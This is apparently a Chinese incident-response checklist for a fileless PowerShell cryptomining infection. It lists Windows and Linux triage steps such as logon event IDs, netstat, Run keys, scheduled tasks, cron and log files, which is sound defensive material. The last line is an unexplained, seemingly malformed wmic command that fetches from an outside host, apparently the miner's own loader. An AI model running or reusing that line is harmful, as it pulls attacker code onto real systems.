新一代--Powershell 无文件挖矿病毒

1.检查系统账号安全
弱口令，端口对外暴露
2.服务器是否存在可疑账号、新增账号
lusrmgr.msc
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
3.结合系统登陆日志，查看管理员登录时间、用户名是否存在异常
eventvwr.msc
Log Parser进行分析

攻击者使用 RDP 远程登录受害者计算机，源主机和目的主机都会生成相应事件。
重要的事件 ID（安全日志，Security.evtx）
4624：账户成功登录
4648：使用明文凭证尝试登录
4778：重新连接到一台 Windows 主机的会话
4779：断开到一台 Windows 主机的会话
远程连接日志
重要事件 ID 和含义：
1149：用户认证成功
21：远程桌面服务：会话登录成功
24：远程桌面服务：会话已断开连接
25：远程桌面服务：会话重新连接成功
远程连接日志关注 RemoteInteractive（10） 和CachedRemoteInteractive（12）表明使用了 RDP ，因为这些登录类型专用于RDP使用。
4.检查异常端口、进程
netstat -ano 查看目前的网络连接，定位可疑的ESTABLISHED
根据netstat 定位出的pid，再通过tasklist命令进行进程定位 tasklist  | findstr “PID”
msinfo32，依次点击     软件环境→正在运行任务   就可以查看到进程的详细信
5.检查启动项、计划任务、服务
Esc + Shift + Ctrl  打开任务管理器 ->  启动
Regedit
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
6.计划任务
at           2008版本前
schtasks.exe
compmgmt.msc    ->     任务计划程序
7.服务自启动
services.msc
8.检查系统相关信息
Systeminfo  补丁缺失
可疑目录  tmp
.xxxx  文件
%UserProfile%\Recent  最近打开的文件或目录
9.自动化工具
杀毒  河马  d盾等

1.历史命令
history
cat /root/.bash_history
2.账户信息
/etc/passwd
/etc/shadow
3.端口
netstat –ltunp
ss – lp
4. 进程 pid定位目录
ps –ef
top
ls /proc/pid
5.计划任务
crontab –l
cat /etc/crontab
cat /var/spool/cron/root
6. 启动项
cat /etc/rc.local
7.可疑文件
find / -name "*.jsp"
8.日志
/var/run/utmp    该日志文件记录有关当前登录的每个用户的信息
/var/log/lastlog   记录最后一次用户成功登陆的时间、登陆IP等信息
/var/log/secure    Linux系统安全日志，记录用户和工作组变坏情况、用户登陆认证情况
/var/log/wtmp    记录每个用户登录、注销及系统的启动、停机的事件，使用last命令查看
/var/log/btmp     记录Linux登陆失败的用户、时间以及远程IP地址

systeminfo 查看系统的基本信息
msinfo32  查看启动项是否正常
lusrmgr.msc 查看是否存在可疑用户
tasklist | findstr “pid”  定位进程
Esc + Shift + Ctrl  定位进程详细目录

wmic /s /u /i:http://cat.xiaoshabi.nl/